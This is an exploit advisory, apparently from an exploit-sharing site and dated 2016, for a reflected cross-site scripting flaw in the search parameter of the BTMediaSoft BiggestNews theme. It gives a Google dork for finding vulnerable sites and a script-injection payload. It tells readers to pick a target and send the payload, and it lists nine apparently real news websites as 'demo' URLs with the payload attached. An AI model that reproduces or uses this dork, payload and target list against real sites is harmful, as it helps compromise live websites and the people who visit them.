######################
# Exploit Title : BTMediaSoft BiggestNews Theme Cross Site Scripting
# Exploit Author : Darkcrew.Org
# Vendor Homepage : https://www.tumeva.com/
# Google Dork : intext:"© 2016 BTMediaSoft Haber Teması"
# Date: 06.07.2016
# Contact: sultan.ahmir1997@yandex.com
######################
# Vulnerable File : /?s=
# Payload : "/></script><script>alert(/MirSultan/)</script>
# Describe : Search dork and select Target. Put /?s= After url such as :
# http://site.com/?s=
# Send data(Payload) with post method ... Ok
#
# Demo :
# http://turktimes.org/?s="/></script><script>alert(/MirSultan/)</script>
# http://kusadasi.news/?s="/></script><script>alert(/MirSultan/)</script>
# http://bilisimhaberi.com/?s="/></script><script>alert(/MirSultan/)</script>
# http://internethaberajansi.com/?s="/</script><script>alert(/MirSultan/)</script>
# http://element9music.com/?s="/></script><script>alert(/MirSultan/)</script>
# http://kusadasihaberler.com/?s="/></script><script>alert(/MirSultan/)</script>
# http://son24haber.com/?s="/></script><script>alert(/MirSultan/)</script>
# http://sondakikakusadasi.com/?s="/></script><script>alert(/MirSultan/)</script>
# http://projehabercisi.com/?s="/></script><script>alert(/MirSultan/)</script>
#
######################
# discovered by : Batur-ı Mir Sultan
######################